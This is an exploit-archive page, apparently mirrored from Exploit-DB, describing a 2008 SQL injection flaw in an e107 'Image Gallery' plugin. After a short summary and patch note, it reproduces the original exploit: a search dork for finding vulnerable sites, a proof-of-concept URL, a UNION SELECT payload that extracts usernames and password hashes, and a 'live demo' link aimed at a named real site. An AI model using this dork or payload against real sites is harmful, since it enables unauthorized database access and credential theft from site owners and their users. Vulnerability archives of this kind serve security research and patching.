header-logo
Suggest Exploit
vendor:
Image Gallery Plugin
by:
boom3rang
7.5
CVSS
HIGH
SQL-injection
89
CWE
Product Name: Image Gallery Plugin
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

e107 Plugin Akira Powered’s ‘Image Gallery’ Remote SQL-injetion Vulnerability

e107 Plugin Akira Powered's 'Image Gallery' is vulnerable to a remote SQL-injection vulnerability. An attacker can exploit this vulnerability to gain access to the database and extract sensitive information such as usernames and passwords. The vulnerability is caused due to the improper sanitization of user-supplied input to the 'page' and 'image' parameters in the 'image_gallery.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL statements to the vulnerable script. Successful exploitation of this vulnerability can result in unauthorized access to the database.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to upgrade to the latest version of the plugin.
Source

Exploit-DB raw data:

####################################################
e107 Plugin Akira Powered's "Image Gallery" Remote SQL-injetion Vulnerability
####################################################

#####################################
Author: boom3rang
Site: www.khg-crew.ws
Greetz: KHG & H!tm@N & chs & redc00de & proxy-ki11er  
Site: www.khg-crew.ws
#####################################


- Download Plugin:  http://www.akirapowered.org/download.php?view.73

- Dork:
inurl:image_gallery.php?page=image-detail

- POC:
http://www.site.com/e107_Path/image_gallery/image_gallery.php?page=image-detail&album=1&image=[exploit]

- Exploit:
-9999+UNION+SELECT+concat_ws(char(58),user_name,user_password)KHG+from+e107_user+where+user_id=1--

- Live demo:
http://www.ifitbleeds.net/e107_plugins/image_gallery/image_gallery.php?page=image-detail&album=1&image=-9999+UNION+SELECT+concat_ws(char(58),user_name,user_password)KHG+from+e107_user+where+user_id=1--



#########################################
- Kosova Hackers Group
- United States of Albania
- Proud to be Albanian
- Proud to be Muslim
#########################################

# milw0rm.com [2008-09-21]